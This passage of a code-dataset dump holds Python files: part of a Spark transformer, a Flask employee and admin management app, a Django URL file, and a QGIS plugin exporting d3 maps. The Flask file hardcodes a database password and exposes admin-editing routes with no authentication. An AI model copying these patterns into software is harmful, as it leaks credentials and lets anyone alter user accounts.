index\n if vector[index] > max:\n max = vector[index]\n max_index = index\n\n return max_index\n\n def _transform(self, row):\n prediction = row[self.input_column]\n index = float(self.get_index(prediction))\n new_row = self.new_dataframe_row(row, self.output_column, index)\n\n return new_row\n\n def transform(self, dataframe):\n return dataframe.rdd.map(self._transform).toDF()\n\n","sub_path":"elephas/transformers.py","file_name":"transformers.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378101544","text":"from app import app\nfrom app.functions import make_salt, make_pw_hash\nfrom flask import Flask, g, render_template, jsonify, url_for, flash\nfrom flask import request, redirect, make_response\nfrom flask import session as login_session\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Extension, Admin, Employee, Logs\nfrom functools import wraps\n\n\n# Connect to Database and create database session\nengine = create_engine('postgresql://telefonia:entr0p1a@localhost/telefoniadb')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n#Employee\n@app.route('/employee', methods=['GET', 'POST'])\ndef employee():\n\tif request.method == 'GET':\n\n\t\temployees = session.query(Employee).all()\n\t\treturn render_template('employee.html', employees=employees)\n\n\telse:\n\t\tif request.method == 'POST':\n\t\t\treturn render_template('employee.html')\n\n#Applicaction User\n@app.route('/appUser', methods=['GET', 'POST'])\ndef appUser():\n\tif request.method == 'GET':\n\n\t\tadmins = session.query(Admin).all()\n\t\treturn render_template('applicationUser.html', admins=admins)\n\n\telse:\n\t\tif request.method == 'POST':\n\t\t\treturn render_template('applicationUser.html')\n\n\n#View Employee\n@app.route('/employee/view/', methods=['GET', 'POST'])\ndef viewEmployee(id):\n\n\temployee = session.query(Employee).filter_by(id = id).one()\n\n\tif request.method == 'GET':\n\t\treturn render_template('view-employee.html', employee=employee)\n\n\telse:\n\t\tif request.method == 'POST':\n\n\t\t\tmail = request.form['textMail']\n\t\t\tpassword = request.form['textPassword']\n\t\t\tif employee.pw_hash == password:\n\t\t\t\tpw_hash = password\n\t\t\telse:\n\t\t\t\tpw_hash = make_pw_hash(mail, password)\n\n\t\t\temployee.userId = request.form['textUserId']\n\t\t\temployee.fullName = request.form['textFullName']\n\t\t\temployee.pw_hash = pw_hash,\n\t\t\temployee.isManager = request.form['selectIsManager']\n\t\t\temployee.mail = mail\n\t\t\temployee.firstManagerId = request.form['textFirstManagerId']\n\t\t\temployee.firstManagerFullName = request.form['textFirstManager']\n\t\t\temployee.firstManagerMail = request.form['textFirstMailManager']\n\t\t\temployee.country = request.form['selectCountry']\n\t\t\temployee.site = request.form['selectSite']\n\t\t\tsession.add(employee)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('employee'))\n\n#Delete Employee\n@app.route('/employee/delete/', methods=['GET', 'POST'])\ndef deleteEmployee(id):\n\n\temployee = session.query(Employee).filter_by(id = id).one()\n\n\tif request.method == 'GET':\n\t\treturn render_template('delete-employee.html', employee=employee)\n\n\telse:\n\t\tif request.method == 'POST':\n\n\t\t\tsession.delete(employee)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('employee'))\n\n\n#New Employee\n@app.route('/newEmployee', methods=['GET', 'POST'])\ndef newEmployee():\n\tif request.method == 'GET':\n\t\treturn render_template('new-employee.html')\n\n\telse:\n\t\tif request.method == 'POST':\n\t\t\tmail = request.form['textMail']\n\t\t\tpassword = request.form['textPassword']\n\n\t\t\tpw_hash = make_pw_hash(mail, password)\n\n\t\t\temployee = Employee(\n\t\t\t\tuserId = request.form['textUserId'],\n\t\t\t\tfullName = request.form['textFullName'],\n\t\t\t\tpw_hash = pw_hash,\n\t\t\t\tisManager = request.form['selectIsManager'],\n\t\t\t\tmail = mail,\n\t\t\t\tfirstManagerId = request.form['textManagerId'],\n\t\t\t\tfirstManagerFullName = request.form['textManager'],\n\t\t\t\tfirstManagerMail = request.form['textMailManager'],\n\t\t\t\tcountry = request.form['selectCountry'],\n\t\t\t\tsite = request.form['selectSite'])\n\n\t\t\tprint(\"dentro de POST newEmployee\")\n\t\t\tsession.add(employee)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('employee'))\n\n\n\n#Add Application User\n@app.route('/addAppUser', methods=['GET', 'POST'])\ndef addAppUser():\n\n\tif request.method == 'GET':\n\t\treturn render_template('add-appUser.html')\n\n\tif request.method == 'POST':\n\t\temployee = session.query(Employee).filter_by(\n\t\t\t\tuserId = request.form['textUserId'],\n\t\t\t\tcountry = request.form['selectCountry']).one()\n\n\t\tprint (\"despues del query de employee\")\n\t\tif employee:\n\t\t\tadmin = Admin(\n\t\t\t\tuserId = request.form['textUserId'],\n\t\t\t\tfullName = employee.fullName,\n\t\t\t\tmail = employee.mail,\n\t\t\t\trol = request.form['selectRol'],\n\t\t\t\tcountry = request.form['selectCountry'],\n\t\t\t\tsite = employee.site,\n\t\t\t\tjustification = request.form['textJustificacion'])\n\n\t\t\tprint (\"despues de crear el objeto\")\n\t\t\tsession.add(admin)\n\t\t\tsession.commit()\n\t\t\treturn redirect(url_for('appUser'))\n\t\telse:\n\t\t\treturn render_template('add-appUser.html')\n\t\t\n#View App User\n@app.route('/appUser/view/', methods=['GET', 'POST'])\ndef viewAppUser(id):\n\n\tadmin = session.query(Admin).filter_by(id = id).one()\n\n\tif request.method == 'GET':\n\t\treturn render_template('view-appUser.html', admin=admin)\n\n\telse:\n\t\tif request.method == 'POST':\n\n\t\t\tadmin.userId = request.form['textUserId']\n\t\t\tadmin.rol = request.form['textRol']\n\t\t\tadmin.fullName = request.form['textFullName']\n\t\t\tadmin.mail = request.form['textMail']\n\t\t\tadmin.country = request.form['selectCountry']\n\t\t\tadmin.site = request.form['selectSite']\n\t\t\tadmin.justification = request.form['textJustificacion']\n\t\t\tsession.add(admin)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('appUser'))\n\n\n#Delete App User\n@app.route('/appUser/delete/', methods=['GET', 'POST'])\ndef deleteAppUser(id):\n\n\tadmin = session.query(Admin).filter_by(id = id).one()\n\n\tif request.method == 'GET':\n\t\treturn render_template('delete-appUser.html', admin=admin)\n\n\telse:\n\t\tif request.method == 'POST':\n\n\t\t\tsession.delete(admin)\n\t\t\tsession.commit()\n\n\t\t\treturn redirect(url_for('appUser'))","sub_path":"app/configurations.py","file_name":"configurations.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148802697","text":"from django.conf.urls import url\n\nfrom note.views import index, regex, git, linux\n\napp_name = 'note'\n\nurlpatterns = [\n url(r'^regex/$', regex, name='regex'),\n url(r'^git/$', git, name='git'),\n url(r'^linux/$', linux, name='linux'),\n url(r'^$', index, name='index'),\n]\n","sub_path":"note/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113384706","text":"import os\nimport sys\nimport inspect\nimport traceback\nimport re\nimport string\nimport shutil\nimport time\nimport codecs\nimport webbrowser\nimport zipfile\n\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom qgis.utils import *\nfrom logger import log\nfrom osHelp import osHelper\nfrom symbology import *\nfrom projections import *\nfrom bbox import *\nfrom outputHelp import *\nfrom viz import *\nfrom gisWrapper import *\nfrom labelHelper import labeling\n\nclass model:\n \"\"\"Model for the UI\"\"\"\n \n def __init__(self, iface):\n \"\"\"Initialise the model\"\"\"\n self.__logger = log(self.__class__.__name__)\n self.__colorField = \"d3Css\"\n self.__sizeField = \"d3S\"\n self.__cssFile = \"color.css\"\n self.__selectedFields = [] \n self.__tempVizFields = [] \n self.__ranges = dataRanges() \n self.__qgis = qgisWrapper() \n \n self.__logger.info(QGis.QGIS_VERSION)\n self.__logger.info(sys.version)\n \n self.iface = iface\n self.title = u\"\"\n self.showHeader = False\n self.width = 800\n self.height = 600\n self.idField = \"\"\n self.formats = []\n self.selectedFormat = None\n self.simplification = \"\"\n self.outputFolder = u\"\"\n self.vectors = [] \n self.projections = [] \n self.selectedProjection = None \n self.legend = False\n self.legendPositions = [\"Top Left\", \"Top Right\", \"Bottom Right\", \"Bottom Left\", \"External\"]\n self.selectedLegendPosition = 0\n self.popup = False\n self.popupPositions = [\"Bubble\", \"External\"]\n self.selectedPopupPosition = 0\n self.panZoom = False\n self.extraVectors = False\n self.showLabels = False\n self.osHelp = osHelper()\n self.hasViz = False \n self.charts = [] \n self.vizLabels = [] \n self.selectedVizChart = None \n self.vizWidth = 240\n self.vizHeight = 240 \n self.steradians = [\"\", \n \"1e-12\", \"2e-12\", \"3e-12\", \"4e-12\", \"5e-12\", \"6e-12\", \"7e-12\", \"8e-12\", \"9e-12\", \n \"1e-11\", \"2e-11\", \"3e-11\", \"4e-11\", \"5e-11\", \"6e-11\", \"7e-11\", \"8e-11\", \"9e-11\", \n \"1e-10\", \"2e-10\", \"3e-10\", \"4e-10\", \"5e-10\", \"6e-10\", \"7e-10\", \"8e-10\", \"9e-10\", \n \"1e-9\", \"2e-9\", \"3e-9\", \"4e-9\", \"5e-9\", \"6e-9\", \"7e-9\", \"8e-9\", \"9e-9\", \n \"1e-8\", \"2e-8\", \"3e-8\", \"4e-8\", \"5e-8\", \"6e-8\", \"7e-8\", \"8e-8\", \"9e-8\", \n \"1e-7\", \"2e-7\", \"3e-7\", \"4e-7\", \"5e-7\", \"6e-7\", \"7e-7\", \"8e-7\", \"9e-7\", \n \"1e-6\", \"2e-6\", \"3e-6\", \"4e-6\", \"5e-6\", \"6e-6\", \"7e-6\", \"8e-6\", \"9e-6\", \n \"1e-5\", \"2e-5\", \"3e-5\", \"4e-5\", \"5e-5\", \"6e-5\", \"7e-5\", \"8e-5\", \"9e-5\", \n \"1e-4\", \"2e-4\", \"3e-4\", \"4e-4\", \"5e-4\", \"6e-4\", \"7e-4\", \"8e-4\", \"9e-4\", \n \"1e-3\", \"2e-3\", \"3e-3\", \"4e-3\", \"5e-3\", \"6e-3\", \"7e-3\", \"8e-3\", \"9e-3\" ]\n \n # list of output formats\n frmts = [cls() for cls in outFormat.__subclasses__()]\n for f in frmts:\n self.formats.append(f)\n \n if len(self.formats) > 0:\n self.selectedFormat = self.formats[0]\n \n # list of tested projections \n projs = [cls() for cls in projection.__subclasses__()]\n for p in projs:\n self.projections.append(p)\n \n if len(self.projections) > 0:\n self.selectedProjection = self.projections[0]\n \n # list of charts for data viz \n cs = [cls() for cls in chart.__subclasses__()] \n for c in cs:\n self.charts.append(c)\n \n if len(self.charts) > 0:\n self.selectedChart = self.charts[0]\n \n \n def hasTopoJson(self): \n \"\"\"Does the system have node.js and topojson installed?\"\"\" \n \n found = False\n \n try: \n found = self.osHelp.helper.hasTopojson()\n \n except Exception as e:\n # What? log and continue\n self.__logger.error(\"Exception\\r\\n\" + traceback.format_exc(None))\n\n return found\n \n \n def setup(self): \n \"\"\"Get the vector layers from QGIS and perform other startup actions\"\"\"\n # Reset\n del self.vectors[:]\n \n layers = iface.legendInterface().layers()\n found = False\n for layer in layers:\n if layer.type() == QgsMapLayer.VectorLayer and layer.rendererV2() is not None:\n found = True\n self.vectors.append(vector(self.iface, layer))\n \n # At __init__ the first in the list will be the main vector layer\n if found == True:\n self.vectors[0].main = True\n \n def setSelectedPopupField(self, name, state):\n \"\"\"Set the selected field state\"\"\"\n if state == True:\n if name not in self.__selectedFields:\n self.__selectedFields.append(name)\n else:\n if name in self.__selectedFields:\n self.__selectedFields.remove(name)\n \n def setSelectedVizField(self, name, state):\n \"\"\"Set the selected viz field state\"\"\"\n if state == True:\n if name not in self.__tempVizFields:\n self.__tempVizFields.append(name)\n else:\n if name in self.__tempVizFields:\n self.__tempVizFields.remove(name)\n \n def resetSelectedVizFields(self):\n \"\"\"Reset the currently selected viz fields\"\"\"\n self.__tempVizFields[:] = []\n \n def getCurrentRangeLength(self):\n \"\"\"Check the length of the current data range\"\"\"\n return len(self.__tempVizFields)\n \n def addCurrentRange(self, name):\n \"\"\"Add the temporary data range to the list\"\"\"\n if len(self.__tempVizFields) > 0:\n data = dataRange(name)\n \n for f in self.__tempVizFields:\n data.appendField(f)\n \n self.__ranges.append(data)\n self.resetSelectedVizFields()\n \n \n def getPopupTemplate(self):\n \"\"\"Return the preview of the html popup\"\"\"\n return self.selectedFormat.getPopupTemplate(self.__selectedFields, self.hasViz, self.vizWidth, self.vizHeight)\n \n def getDataRangePreview(self):\n \"\"\"Get the preview of fields in each data range\"\"\"\n temp = \"\"\n \n for data in self.__ranges:\n temp += data.getDisplayString()\n temp += \"\\r\\n\"\n \n return temp\n \n def deleteLastRange(self):\n \"\"\"Remove the last data range from the list\"\"\"\n if len(self.__ranges) > 0:\n self.__ranges.pop()\n \n def resetRanges(self):\n \"\"\"Remove all previously created ranges\"\"\"\n self.__ranges[:] = []\n \n def getRangeCount(self):\n \"\"\"Retrieve the count of data ranges\"\"\"\n return len(self.__ranges)\n \n def getVizLabelMask(self):\n \"\"\"Get the input mask for the data viz labels\"\"\"\n return self.__ranges.getQtLabelMask()\n \n def setSelectedLayer(self, name, state):\n \"\"\"Set the selected extra layer for use in the map\"\"\" \n for v in self.vectors:\n if v.name == name: \n v.extra = state\n \n def getSelectedLayers(self):\n \"\"\"Retrieve the selected vector layers\"\"\"\n found = []\n for v in self.vectors:\n if v.extra == True:\n found.append(v)\n return found\n \n def setMainLayer(self, index):\n \"\"\"Set the main layer for use in the map\"\"\"\n for v in self.vectors:\n v.main = False\n \n self.vectors[index].main = True\n # also clear the list of selected fields\n self.__selectedFields = []\n \n def getMainLayer(self):\n \"\"\"Retrieve the selected main vector layer\"\"\"\n found = None\n for v in self.vectors:\n if v.main == True:\n found = v\n return found\n \n def setSelectedProjection(self, index):\n \"\"\"Set the selected projection for use later\"\"\"\n for p in self.projections:\n p.selected = False\n \n self.projections[index].selected = True\n \n def getSelectedProjection(self):\n \"\"\"Retrieve the selected projection\"\"\" \n found = None\n for p in self.projections:\n if p.selected == True:\n found = p\n return found \n \n def getLayersForOutput(self):\n \"\"\"Get all the layers selected for output in the order defined in the QGIS legend\"\"\"\n found = []\n # Get all vecotr layers, extras as well as the main layer\n for v in self.vectors:\n if (self.extraVectors == True and v.extra == True) or v.main == True:\n found.append(v)\n # Reverse the order for processing the output, \n # this will also form the order the SVG groups are created\n found.reverse()\n return found \n \n def getUniqueFolderName(self): \n \"\"\"Get a unique folder name\"\"\"\n return time.strftime(\"%Y%m%d%H%M%S\") \n \n def getSymbology(self, renderer, layer, transparency, index):\n \"\"\"Read the symbology, generate a CSS style and set against each row in the layers attribute table\"\"\"\n \n dump = renderer.dump() \n self.__logger.info(dump)\n \n if dump[0:6] == \"SINGLE\":\n return self.setSingleSymbol(layer, renderer, transparency, index) \n elif dump[0:11] == \"CATEGORIZED\":\n return self.setCategorizedSymbol(layer, renderer, transparency, index) \n elif dump[0:9] == \"GRADUATED\": \n return self.setGraduatedSymbol(layer, renderer, transparency, index)\n else:\n words = dump.split(\" \")\n e = ValueError(\"{0} renderer in {1} not supported\".format(words[0], layer.name))\n raise e \n \n def setSingleSymbol(self, layer, renderer, transparency, index):\n \"\"\"Read the symbology for single symbol layers\"\"\" \n\n self.__logger.info(\"setSingleSymbol\")\n geoType = layer.geometryType() \n \n syms = layerSymbols()\n cssstub = self.getLayerObjectName(index)\n \n css = cssstub + \"r0\"\n s = singleSymbol(geoType, renderer.symbol(), index, css, transparency) \n syms.append(s) \n\n return syms\n \n def setCategorizedSymbol(self, layer, renderer, transparency, index):\n \"\"\"Read the symbology for categorized symbol layers\"\"\"\n \n self.__logger.info(\"setCategorizedSymbol\")\n field = renderer.classAttribute()\n geoType = layer.geometryType()\n cssstub = self.getLayerObjectName(index)\n syms = layerSymbols()\n \n fieldType = \"String\"\n fields = layer.pendingFields()\n for f in fields:\n if f.name() == field:\n fieldType = f.typeName() \n break\n \n for i, c in enumerate(renderer.categories()):\n css = cssstub + \"c\" + str(i)\n s = categorized(geoType, field, fieldType, c, index, css, transparency) \n syms.append(s) \n \n return syms\n \n def setGraduatedSymbol(self, layer, renderer, transparency, index):\n \"\"\"Read the symbology for graduated symbol layers\"\"\"\n \n self.__logger.info(\"setGraduatedSymbol\")\n field = renderer.classAttribute()\n geoType = layer.geometryType()\n cssstub = self.getLayerObjectName(index)\n syms = layerSymbols()\n \n for i, r in enumerate(renderer.ranges()):\n css = cssstub + \"r\" + str(i)\n s = graduated(geoType, field, r, index, css, transparency) \n syms.append(s) \n \n return syms\n \n def writeSymbology(self, layer, syms):\n \"\"\"Write the CSS value to the d3css column\"\"\"\n # Create a single transaction for the whole lot\n layer.startEditing() \n # Loop through each symbol\n if syms is not None:\n for sym in syms:\n filt = sym.getFilterExpression()\n self.__logger.info(\"Filter: \" + filt)\n \n # Get the features with this particular symbology\n features = None\n if len(filt) > 0:\n features = layer.getFeatures(QgsFeatureRequest().setFilterExpression(filt))\n else: \n features = layer.getFeatures()\n \n # Loop though each feature returned from the filter\n for feature in features:\n index = layer.fieldNameIndex(self.__colorField) \n layer.changeAttributeValue(feature.id(), index, sym.symbol.css)\n index = layer.fieldNameIndex(self.__sizeField) \n layer.changeAttributeValue(feature.id(), index, sym.symbol.size)\n\n # Commit the transaction\n layer.commitChanges()\n \n def getCanvasStyle(self):\n \"\"\"Get the canvas background color\"\"\"\n style = \"#mapSvg{{background-color: {0};}}\\n\"\n return style.format(self.iface.mapCanvas().canvasColor().name())\n \n def writeCss(self, uid, symbols, labels):\n \"\"\"Create/append CSS file for symbology\"\"\"\n n = self.getDestCssFile(uid)\n f = open(n, \"a\")\n try:\n # write out the background color on the first iteration through the outer loop\n f.write(self.getCanvasStyle())\n \n # write out all the symbols associated with the layer\n if symbols is not None:\n for sym in symbols:\n f.write(sym.symbol.toCss() + \"\\n\")\n \n # write out the label styles\n if labels is not None:\n for label in labels:\n if label.hasLabels() == True:\n f.write(label.getStyle() + \"\\n\")\n \n except Exception as e:\n # don't leave open files \n self.__logger.error(\"Exception\\r\\n\" + traceback.format_exc(None))\n raise e\n finally:\n f.close()\n \n def writeDataFile(self, uid):\n \"\"\"Write the main info file which will be used in the popup\"\"\"\n main = self.getMainLayer()\n features = main.layer.getFeatures()\n \n n = self.getDestDataFile(uid)\n f = codecs.open(n, \"a\", \"utf-8\")\n try:\n if self.hasViz == True:\n # Merge the range data with any selected fields\n for range in self.__ranges:\n fields = range.getFields()\n for field in fields:\n if field not in self.__selectedFields:\n self.__selectedFields.append(field)\n \n # Add the csv header\n if self.idField not in self.__selectedFields:\n self.__selectedFields.append(self.idField)\n \n f.write(u\",\".join(self.__selectedFields))\n f.write(\"\\n\") \n \n # Loop though each feature and read the values\n for feature in features:\n line = u\"\"\n for field in self.__selectedFields:\n idField = (field == self.idField)\n line += self.safeCsvString(feature[field], idField) + \",\"\n f.write(unicode(line[:-1]))\n f.write(u\"\\n\")\n \n except Exception as e:\n self.__logger.error(\"Exception\\r\\n\" + traceback.format_exc(None))\n raise e\n finally:\n f.close()\n \n def writeLegendFile(self, uid, syms):\n \"\"\"Write the legend for the main layer\n Output limited to Graduated and Categorized renderers\"\"\"\n \n '''Note: Only check the actual object, not derived types due to inheritance hierarchy'''\n if syms is not None and len(syms) > 0 and type(syms[0]) != singleSymbol :\n n = self.getDestLegendFile(uid)\n f = codecs.open(n, \"a\", \"utf-8\")\n #for now a fixed width and height for the legend\n template = u\"{w},{h},{c},{t}\\n\"\n try:\n \n f.write(\"Width,Height,Color,Text\\n\");\n for sym in syms:\n if len(sym.label.strip()) > 0:\n uCss = unicode(sym.symbol.css) \n uText = self.safeCsvUnicode(sym.label, False)\n \n f.write(template.format(\n w = sym.symbol.legendWidth,\n h = sym.symbol.legendHeight,\n c = uCss, \n t = uText));\n \n except Exception as e:\n # don't leave open files \n self.__logger.error(\"Exception\\r\\n\" + traceback.format_exc(None))\n raise e\n finally:\n f.close()\n \n def safeCsvString(self, obj, idField):\n \"\"\"Make a string safe from commas and NULLS\"\"\"\n val = obj\n if isinstance(obj, unicode) == False:\n val = str(obj)\n \n if val == \"NULL\":\n val = \"\"\n if idField == True:\n # d3 strips empty floating points from its id property returning whole numbers\n if val.endswith(\".0\"):\n val = val[:len(val)-2] \n \n return val.replace(\",\",\"\")\n \n def safeCsvUnicode(self, obj, idField):\n \"\"\"Make a string safe for use in a CSV file\n \n returns unicode formatted string\"\"\"\n \n val = obj\n if isinstance(obj, unicode) == False:\n val = unicode(obj, \"utf-8\") \n \n return self.safeCsvString(val, idField)\n \n \n def createFolders(self, uid):\n \"\"\"Create the folder structure and copy code files\"\"\"\n src = self.getSourceFolder()\n dest = self.getDestFolder(uid)\n \n try:\n if os.path.isdir(dest):\n # Never going to happen, but just in case... \n self.log.info(\"delete previous folder \" + dest)\n shutil.rmtree(dest) \n\n # Now copy over\n shutil.copytree(src, dest, ignore=self.excludeFiles)\n \n except OSError as e: \n self.__logger.error(e.args[1])\n \n def excludeFiles(self, dir, files):\n \"\"\"Don't copy over the file used to force empty directory creation during \n the plugin distribution as a zip file\"\"\"\n \n return {\".forcecreation\"}\n \n def zipShpFiles(self, uid):\n \n dest = \"source.zip\"\n path = self.getDestShpFolder(uid)\n \n try:\n zipf = zipfile.ZipFile(os.path.join(path, dest), \"w\")\n for root, dirs, files in os.walk(path):\n for file in files:\n if file != dest:\n filePath = os.path.join(root, file)\n zipf.write(filePath, file)\n os.remove(filePath)\n zipf.close()\n except:\n self.__logger.error2()\n pass\n \n def isWindows(self):\n \"\"\"Windows OS?\"\"\"\n return self.osHelp.isWindows \n \n def getSourceFolder(self):\n \"\"\"Get the plugin html source folder\"\"\"\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), \"html\")\n \n def getDestFolder(self, uid):\n \"\"\"Get the destination folder with the unique id appended\"\"\"\n safeFolder = self.outputFolder\n if self.isWindows() == True:\n safeFolder = self.outputFolder.encode('ascii', 'ignore')\n\n return os.path.join(safeFolder, uid)\n \n def getUniqueFilePath(self, fullPath):\n \"\"\"Get a unique full path to a file\"\"\"\n if os.path.exists(fullPath):\n \n path, name = os.path.split(fullPath)\n name, ext = os.path.splitext(name) \n make = lambda i: os.path.join(path, '%s(%d)%s' % (name, i, ext))\n \n for i in xrange(2, sys.maxint):\n fullPath = make(i)\n if not os.path.exists(fullPath):\n break\n \n return fullPath\n \n def getDestShpFile(self, uid, layer):\n \"\"\"Get the destination path to the shapefile\"\"\"\n dest = self.getDestShpFolder(uid)\n \n fullPath = self.getUniqueFilePath(os.path.join(dest, layer.name + \".shp\"))\n \n return fullPath\n \n def getDestShpFolder(self, uid):\n \"\"\"Get the destination shapefile folder path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"shp\")\n \n def getDestIndexFile(self, uid):\n \"\"\"Get the destination index file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"index.html\")\n \n def getDestCssFile(self, uid):\n \"\"\"Get the destination CSS file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"css\", self.__cssFile)\n \n def getDestDataFile(self, uid):\n \"\"\"Get the destination info file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"data/info.csv\")\n \n def getDestLegendFile(self, uid):\n \"\"\"Get the destination legend file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"data/legend.csv\")\n \n def getDestJsonFolder(self, uid):\n \"\"\"Get the destination shapefile folder\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"json\")\n \n def getDestImgFolder(self, uid):\n \"\"\"Get the destination image file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"img\")\n \n def copyImgFiles(self, uid, renderers):\n \"\"\"Copy any external image files for the layer symbology to the destination folder\n \n :param uid: Unique identifier for the destination folder \n :type uid: string\n \n :param renderers: List of renderers associated with the layer symbology (categorised and graduated renederers will have more than one)\n :type renderers: list[d3MapRenderer.symbology.singleSymbol]\n \n \"\"\"\n \n for renderer in renderers:\n if renderer.symbol.hasImage() == True:\n head, tail = os.path.split(renderer.symbol.path)\n shutil.copyfile(renderer.symbol.path, os.path.join(self.getDestImgFolder(uid), tail))\n \n \n def addColumns(self, layer):\n \"\"\"Add a new column to hold the color and size used in symbology\"\"\"\n if self.__qgis.hasField(layer, self.__colorField) == False:\n self.__qgis.addField(layer, self.__colorField) \n if self.__qgis.hasField(layer, self.__sizeField) == False:\n self.__qgis.addField(layer, self.__sizeField) \n \n def getSafeString(self, val):\n \"\"\"Return a string condsidered safe for use in file names\"\"\"\n pattern = re.compile('[\\W_]+', re.UNICODE)\n return pattern.sub(\"\", val) \n \n def getLayerObjectName(self, index):\n \"\"\"Get a unique layer name as an object within topojson\"\"\"\n return \"l\" + str(index)\n \n def getProgressTicks(self):\n \"\"\"Get the amount of progress steps\"\"\"\n layers = self.getLayersForOutput()\n return 3 + (7 * len(layers))\n \n def areLayersModified(self):\n \"\"\"Have the chosen layers been modified?\"\"\"\n isEdit = False\n \n layers = self.getLayersForOutput()\n for vect in layers: \n if vect.layer.isEditable() == True and vect.layer.isModified() == True:\n isEdit = True\n break\n \n return isEdit\n \n def logExportParams(self, main):\n \"\"\"Log the parameters to the log messages panel\"\"\"\n template = u\" {0} = [{1}]\"\n \n self.__logger.info(template.format(\"Title\", self.title))\n self.__logger.info(template.format(\"Header\", str(self.showHeader)))\n self.__logger.info(template.format(\"Width\", str(self.width)))\n self.__logger.info(template.format(\"Height\", str(self.height)))\n self.__logger.info(template.format(\"Main layer\", main.name))\n self.__logger.info(template.format(\"IDField\", self.idField))\n self.__logger.info(template.format(\"Projection\", self.selectedProjection.name))\n self.__logger.info(template.format(\"Format\", self.selectedFormat.name))\n self.__logger.info(template.format(\"Simplify\", self.simplification))\n self.__logger.info(template.format(\"Output\", self.outputFolder))\n self.__logger.info(template.format(\"Zoom/Pan\", str(self.panZoom)))\n self.__logger.info(template.format(\"Legend\", str(self.legend)))\n self.__logger.info(template.format(\"LegendPos\", self.legendPositions[self.selectedLegendPosition]))\n \n extras = []\n layers = self.getLayersForOutput()\n for l in layers:\n extras.append(l.name)\n self.__logger.info(template.format(\"IncExtras\", str(self.extraVectors)))\n self.__logger.info(template.format(\"Extras\", \", \".join(extras)))\n \n self.__logger.info(template.format(\"IncPopup\", str(self.popup)))\n self.__logger.info(template.format(\"PopupPos\", self.popupPositions[self.selectedPopupPosition]))\n self.__logger.info(template.format(\"Popup\", self.getPopupTemplate()))\n \n self.__logger.info(template.format(\"IncViz\", str(self.hasViz)))\n self.__logger.info(template.format(\"Chart\", self.selectedVizChart.name))\n self.__logger.info(template.format(\"VizWidth\", str(self.vizWidth)))\n self.__logger.info(template.format(\"DataRanges\", self.getDataRangePreview())) \n self.__logger.info(template.format(\"Labels\", \", \".join(self.vizLabels))) \n\n \n def export(self, progress, webServerUrl):\n \"\"\"Main export function. Do the stuff.\n \n :param progress: Progress bar widget.\n :type progress: QProgressBar\n \"\"\"\n tick = 0\n progress.setValue(tick)\n \n main = self.getMainLayer()\n \n if main is not None: \n self.__logger.info(\"EXPORT start ==================================================\")\n self.logExportParams(main)\n \n # Create a class to help in replacing all the JavaScript in the index.html file\n outVars = outputVars(main.layer, self.title, self.width, self.height, self.showHeader, self.idField, \n (self.selectedPopupPosition == 1), \n self.legend, self.panZoom, self.selectedLegendPosition,\n self.selectedVizChart, self.__ranges, self.vizLabels,\n self.vizHeight, self.vizWidth, self.showLabels) \n # Initialise bounding box for projection with full \n bbox = bound()\n\n # Create the directory structure\n self.__logger.info(\"EXPORT copying folders and files\")\n uid = self.getUniqueFolderName()\n self.createFolders(uid)\n \n tick+=1\n progress.setValue(tick)\n \n # Get QgsVectorLayers in correct order\n layers = self.getLayersForOutput()\n \n # List for all QgsVectorLayers symbology\n symbols = []\n \n # List for all QgsVectorLayers label styles\n labels = [] \n\n for i, vect in enumerate(layers): \n self.__logger.info(\"EXPORT \" + vect.name) \n vect.filePath = self.getDestShpFile(uid, vect)\n \n renderer = vect.layer.rendererV2()\n \n self.__qgis.saveShape(vect.layer, vect.filePath)\n\n tick+=1\n progress.setValue(tick)\n \n # Re-open saved shape file now its available for editing \n destLayer = self.__qgis.openShape(vect.filePath, vect.name) \n \n # Read the extent of the layer now its in the correct crs\n if vect.main == True:\n extent = destLayer.extent()\n bbox.setLeft(extent.xMinimum())\n bbox.setBottom(extent.yMinimum())\n bbox.setRight(extent.xMaximum())\n bbox.setTop(extent.yMaximum())\n \n # Add a color column\n self.addColumns(destLayer)\n tick+=1\n progress.setValue(tick)\n \n # Read colors from the QgsVectorLayer\n syms = self.getSymbology(renderer, destLayer, vect.transparency, i)\n tick+=1\n progress.setValue(tick)\n \n # Write color column to the QgsVectorLayer\n self.writeSymbology(destLayer, syms)\n tick+=1\n progress.setValue(tick)\n \n # Close the shapefile\n del destLayer\n \n # Determine the attributes to preserve from the shapefile\n # Limited to color, id and label fields\n # Popup attributes are preserved in a CSV file \n preserveAttributes = [self.__colorField, self.__sizeField]\n \n # Get any labels for the QgsVectorLayer\n label = labeling(vect.layer, i)\n if self.showLabels == True and label.hasLabels() == True:\n labels.append(label)\n preserveAttributes.append(label.fieldName)\n \n tick+=1\n progress.setValue(tick) \n \n # Only output the id field for the main layer\n idAttribute = \"\"\n if vect.main == True:\n idAttribute = self.idField \n \n # Create the output json file\n path = self.getDestJsonFolder(uid) \n name = self.getSafeString(vect.name) \n objName = self.getLayerObjectName(i) \n \n # And then store the details in order to write the index file\n destPath = self.getUniqueFilePath(os.path.join(path, name + self.selectedFormat.extension))\n objName, name = self.selectedFormat.convertShapeFile(path, destPath, 